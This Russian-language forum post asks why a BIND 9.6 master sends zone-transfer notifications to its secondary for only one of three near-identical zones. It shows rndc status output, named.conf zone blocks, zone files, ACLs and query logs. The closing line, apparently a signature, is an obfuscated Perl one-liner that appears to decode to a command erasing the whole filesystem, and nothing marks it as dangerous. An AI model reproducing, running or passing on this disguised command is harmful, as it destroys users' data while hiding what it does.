Приветствую всех!
Бинд весь мозг взорвал. Делаю три зоны, фактически под копирку, пробел в конце есть все проверено не однократно, зоны в норме. В конфе бинда все однотипно. Одну зону передает на вторичный, две нет. Что имеем:
# rndc status
version: 9.6.2-P2 (DNS)
CPUs found: 4
worker threads: 4
number of zones: 16
debug level: 0
xfers running: 0
xfers deferred: 0
soa queries in progress: 0
query logging is ON
recursive clients: 0/0/1000
tcp clients: 0/100
server is up and running
named.conf описание зон:
zone "1.com" {
type master;
file "1.com.hosts";
allow-query { any; };
notify yes;
also-notify { xxx.xxx.xxx.xxx; };
};
zone "2.ru" {
type master;
file "2.ru.hosts";
allow-query { any; };
notify yes;
also-notify { xxx.xxx.xxx.xxx; };
};
zone "3.org.ru" {
type master;
file "3.org.ru.hosts";
allow-query { any; };
notify yes;
also-notify { xxx.xxx.xxx.xxx; };
};
В options - allow-transfer { trusted; };
ACL trusted - доверенные IP. Добавлял allow-transfer { xxx.xxx.xxx.xxx; }; в описание зон, один фиг.
Теперь файлы самих зон:
1.com:
$ORIGIN .
$ttl 3600
1.com. IN SOA ns1.1.su. administrator.1.su. (
2010111802
900
600
86400
3600 )
IN NS ns1.1.su.
IN NS ns2.2.net.
A xxx.xxx.xxx.xxx
$ORIGIN 1.com.
wap A xxx.xxx.xxx.xxx
www CNAME 1.com.
2.ru
$ORIGIN .
$ttl 3600
2.ru. IN SOA ns1.1.su. administrator.1.su. (
2010111801
900
600
86400
3600 )
IN NS ns1.1.su.
IN NS ns2.2.net.
A xxx.xxx.xxx.xxx
$ORIGIN 2.ru.
www CNAME 2.ru.
3.org.ru
$ORIGIN .
$TTL 3600 ; 1 hour
3.org.ru IN SOA ns1.1.su. administrator.1.su. (
2010111802 ; serial
900 ; refresh (15 minutes)
600 ; retry (10 minutes)
86400 ; expire (1 day)
3600 ; minimum (1 hour)
)
NS ns1.1.su.
IN NS ns2.2.net.
A xxx.xxx.xxx.xxx
$ORIGIN 3.org.ru.
www A xxx.xxx.xxx.xxx
Еще раз, в зонах пустая строка учтена везде, все запятые и прочие вплодь до количества пробелов - пересчитаны
, что в зонах, что в конфе бинда. Как видно из конфа бинда в зонах я явно указываю also-notify. Теперь обновляем у всех трех зон серийники и делаем рестар бинда, что в логе:
18-Nov-2010 09:31:02.809 notify: info: zone 1.com/IN: sending notifies (serial 2010111803)
18-Nov-2010 09:31:02.809 notify: info: zone 2.ru/IN: sending notifies (serial 2010111803)
18-Nov-2010 09:31:02.810 notify: info: zone 3.org.ru/IN: sending notifies (serial 2010111803)
18-Nov-2010 09:31:02.810 general: notice: running
18-Nov-2010 09:31:03.512 queries: info: client xxx.xx.xxx.xxx#59949: query: 1.com IN SOA -E
18-Nov-2010 09:31:03.774 queries: info: client xxx.xx.xxx.xxx#49291: query: 1.com IN IXFR -
18-Nov-2010 09:31:03.774 xfer-out: info: client xxx.xx.xxx.xxx#49291: transfer of '1.com/IN': AXFR-style IXFR started
18-Nov-2010 09:31:03.774 xfer-out: info: client xxx.xx.xxx.xxx#49291: transfer of '1.com/IN': AXFR-style IXFR ended
...
xxx.xx.xxx.xxx - в логе это вторичный DNS
Как видно из лога, все зоны прочитались без ошибок, серийник сменился, но только зона 1.com послала уведомление об изменении на вторчный. И на вторичном соответственно все поменялось. По двум другим зонам - передачи нет.
Все тесты dig на сервере проходят, трансфер на локалхост дигом делал, и по внешнему опять же на сервере делал. Со вторичного телнетом к серверу подключается не проблема. Вобщем перепробовал вроде все. Сами домены пингуются с любого хоста так как allow-query { any; }; в зонах, глобально
allow-transfer { trusted; };
allow-query { trusted; };
allow-recursion { trusted; };
blackhole { deny; };
только доверенным вобщем.
Что еще делал, в опциях убирал все запреты на трасты и прочее, делал уже открыто всем все, результат тот же
. Одна зона норма, две другие не хотят.
echo "good..." | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'